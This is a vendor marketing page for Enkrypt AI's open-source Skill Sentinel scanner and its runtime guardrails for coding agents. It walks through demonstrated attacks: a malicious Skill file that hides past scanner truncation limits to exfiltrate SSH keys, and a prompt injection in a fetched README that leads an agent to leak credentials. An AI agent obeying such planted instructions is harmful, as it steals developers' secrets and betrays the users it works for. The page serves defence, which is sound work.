Let your team vibe code -
without losing control

AI coding agents are powerful. But they execute Skills with no security review, and run commands with no policy enforcement. Enkrypt AI gives you both layers: scan before execution, govern during it.

Works with

Cursor
Claude Code
Kiro
CrewAI
LangGraph
OpenAI SDK
Vercel AI

Security gaps at every stage of execution

Scanning catches threats before they run. Guardrails catch behavior that shouldn't run - even from Skills that look clean. You need both.

Supply Chain · Layer 1
Skills are executable code - not just documentation
When a developer clones a repo with a .cursor/skills/ or .claude/skills/ directory, they're installing behavior that controls what their AI agent does. A malicious Skill can silently steal credentials before anyone notices.
No install dialog, no security warning, no permission prompt
Malicious instructions buried deep in markdown files - past where scanners stop reading
Auto-activation means "clean up this code" can trigger credential exfiltration
Existing scanners truncate files and miss attacks beyond ~3,000 characters
Runtime Behavior · Layer 2
Agents act autonomously - with no visibility into what they're doing
Even a perfectly clean Skill can be misused at runtime. Without hooks into the agent's execution path, you have no visibility into what commands it runs, what files it reads, or what data leaves your environment.
Coding agents can read ~/.ssh/, .env, and cloud credentials without warning
Multi-step tool chains can exfiltrate data through seemingly innocent sequences
No audit trail: you can't reconstruct what the agent did or why
Novel attacks at runtime won't be caught by pre-execution scanning alone

Real attacks - demonstrated by Enkrypt AI

Each attack requires a different layer to catch it. Scanning alone or runtime governance alone leaves you exposed.

Skill Sentinel catches this
Supply Chain Attack
1
Developer clones a repo
Repo contains a ".cursor/skills/code-cleanup" directory
2
Opens the project in Cursor
Asks the agent to "clean up this code" - a routine request
3
Agent auto-activates the Skill
The malicious SKILL.md is read in full - including hidden instructions beyond character 3,000
4
SSH key exfiltrated silently
Hidden instruction runs a script that reads ~/.ssh/id_rsa and POSTs it to an attacker endpoint
Guardrails catch this
Runtime Misuse Attack
1
Developer uses a legitimate Skill
A clean, well-reviewed Skill for "deploying a staging build"
2
Agent reads environment variables
The Skill legitimately needs AWS_ACCESS_KEY_ID - agent reads the .env file
3
Context hijack mid-session
A prompt injection in a fetched README redirects agent behavior mid-task
4
Credentials sent to model output
Agent includes raw credentials in its response - no scan would have caught this

Scan the supply chain. Govern the runtime.

Scanning catches threats before they execute. Guardrails enforce policy while agents are running. You need both.

Layer 1 - Supply Chain
Skill Sentinel
Open-source scanner that treats Skills as the security-critical supply chain components they are. No truncation. Multi-agent analysis. Malware detection built in.
Full-file analysis - no truncation limits that attackers can exploit
Multi-agent pipeline: manifest inspection, file verification, cross-referencing, threat correlation
VirusTotal integration for binary and archive scanning
Cross-file threat correlation - catches multi-file attacks
Parallel bulk scanning of all Cursor, Claude Code, Codex, and OpenClaw Skills
OWASP LLM Top 10 + Agentic Top 10 threat mapping
Layer 2 - Runtime
Guardrails for Coding Agents
Hook into your coding agent's execution path and enforce policy in real time - what data it can access, which commands it can run, and what leaves your environment.
Visibility into what coding agents actually do - commands, file access, network calls
Policy-based enforcement: block credential access, restrict shell commands, redact secrets
Every decision stamped with policy_id + reason_code for audit trails
Command allowlisting - permit read-only operations, block network and install by default
Approval gates for sensitive operations (deployments, credential access, infra changes)
Export enforcement events to SIEM and ticketing systems

What Skill Sentinel and Guardrails catch

Mapped to OWASP Top 10 for LLM Applications and OWASP Top 10 for Agentic Applications.

Sentinel
Guardrails
Combined
Prompt injection in Skills
Override attempts, mode changes, policy bypass instructions hidden in SKILL.md files
Data exfiltration directives
Network calls designed to steal credentials, SSH keys, API tokens, or source code
Obfuscated payloads
Base64 + exec, hex-encoded payloads, and unreadable code designed to evade review
Hardcoded secrets
Embedded API keys, passwords, and private keys in Skill files and scripts
Malware in binaries
Executables, archives, and PDFs scanned against VirusTotal's database
Transitive trust abuse
Delegation to untrusted external sources, cross-context bridging between files
Unauthorized command execution
Block dangerous shell commands, package installs, and system modifications at runtime
Credential access
Prevent reading SSH keys, env files, cloud credentials, and API tokens without approval
Secret leakage in output
Redact sensitive data before it's sent to the model or logged in agent output
Network exfiltration
Block or alert on outbound network calls from coding agents to unknown endpoints
Tool chaining abuse
Multi-step workflows that read sensitive data then transmit it - caught in scan and at runtime
Autonomy abuse
Skills or actions that exceed intended scope - auto-deploying, modifying infra, or escalating privileges

From clone to governed in four steps

Skill Sentinel scans before execution. Guardrails enforce during execution. Both produce evidence.

1) Scan Skills

Run Skill Sentinel on .cursor/skills/ and .claude/skills/ - in CI or locally

2) Review & approve

Triage findings, block malicious Skills, approve safe ones into your allowlist

3) Hook guardrails

Integrate runtime enforcement - command allowlists, data policies, approval gates

4) Monitor & export

Every enforcement decision logged with policy_id - export to SIEM or audit packet

Running in minutes, not sprints

Skill Sentinel is open source and installs with pip. Guardrails integrate via hooks or proxy.

Skill Sentinel
Scan your Skills
Skill Sentinel - scan your Skills
# Install
pip install skill-sentinel

# Scan a single Skill
skill-sentinel scan --skill ./my-skill

# Scan all Cursor skills in parallel
skill-sentinel scan cursor --parallel

# Auto-discover and scan everything
skill-sentinel scan

# CI/CD integration
skill-sentinel scan --dir .cursor/skills/
skill-sentinel scan --dir .claude/skills/
Guardrails
Enforce at runtime
Guardrails - enforce at runtime
# Hook into your coding agent
# via API wrapper, proxy, or SDK

# Define a policy pack
policy:
  block_commands:
    - curl, wget, nc, ssh
    - pip install, npm install
  block_file_access:
    - ~/.ssh/*, ~/.aws/*
    - .env, *.pem, *.key
  require_approval:
    - deploy, publish, push
    - rm -rf, chmod, chown

# Every decision → policy_id + trace

Works with the coding agents your team already uses

Skill Sentinel scans Skills from any provider. Guardrails hook into any agent's execution path.

Frequently Asked Questions

How is Skill Sentinel different from Cisco's AI Skill Scanner?
Cisco's scanner truncates files at ~3,000 characters for markdown and ~1,500 for code - our demonstrated attack bypassed it entirely by placing malicious instructions beyond these limits. Skill Sentinel reads complete files with no truncation, uses a multi-agent analysis pipeline, includes VirusTotal malware scanning, and performs cross-file threat correlation to catch sophisticated multi-file attacks.
Is Skill Sentinel open source?
Yes. Skill Sentinel is fully open source on GitHub. Install with pip, export your API key, and start scanning. The free tier of VirusTotal provides 500 lookups per day for malware detection.
Why do I need Guardrails if I'm already scanning Skills?
Scanning catches known threats before execution - but it can't prevent a legitimate Skill from being misused at runtime, or catch novel attacks it hasn't seen before. Guardrails enforce policy during execution: blocking credential access, restricting commands, redacting secrets, and requiring approval for sensitive operations. Defense in depth means you need both layers.
Can I integrate Skill Sentinel into CI/CD?
Yes. Run skill-sentinel scan --dir .cursor/skills/ as a CI step. It produces JSON reports with severity levels, evidence, and remediation recommendations. Gate your pipeline on the results - block merges that introduce malicious or suspicious Skills.
Does the Guardrails layer add latency to my coding workflow?
Guardrails are designed for low-latency enforcement. Command allowlisting and file access policies are evaluated locally in microseconds. More complex policies that involve content inspection add single-digit milliseconds. Developers won't notice the difference.
What should we do as a quick win right now?
Three immediate actions:
  • (1) Install Skill Sentinel and scan all Skills in your repos today - it takes five minutes.
  • (2) Disable auto-execution in your coding agents and require explicit approval for commands.
  • (3) Add CODEOWNERS rules to require security review for changes to .cursor/ and .claude/ directories. These three steps cover the most critical gaps while you evaluate the full Guardrails integration.

Your developers are vibe coding right now. Are the Skills they're using safe?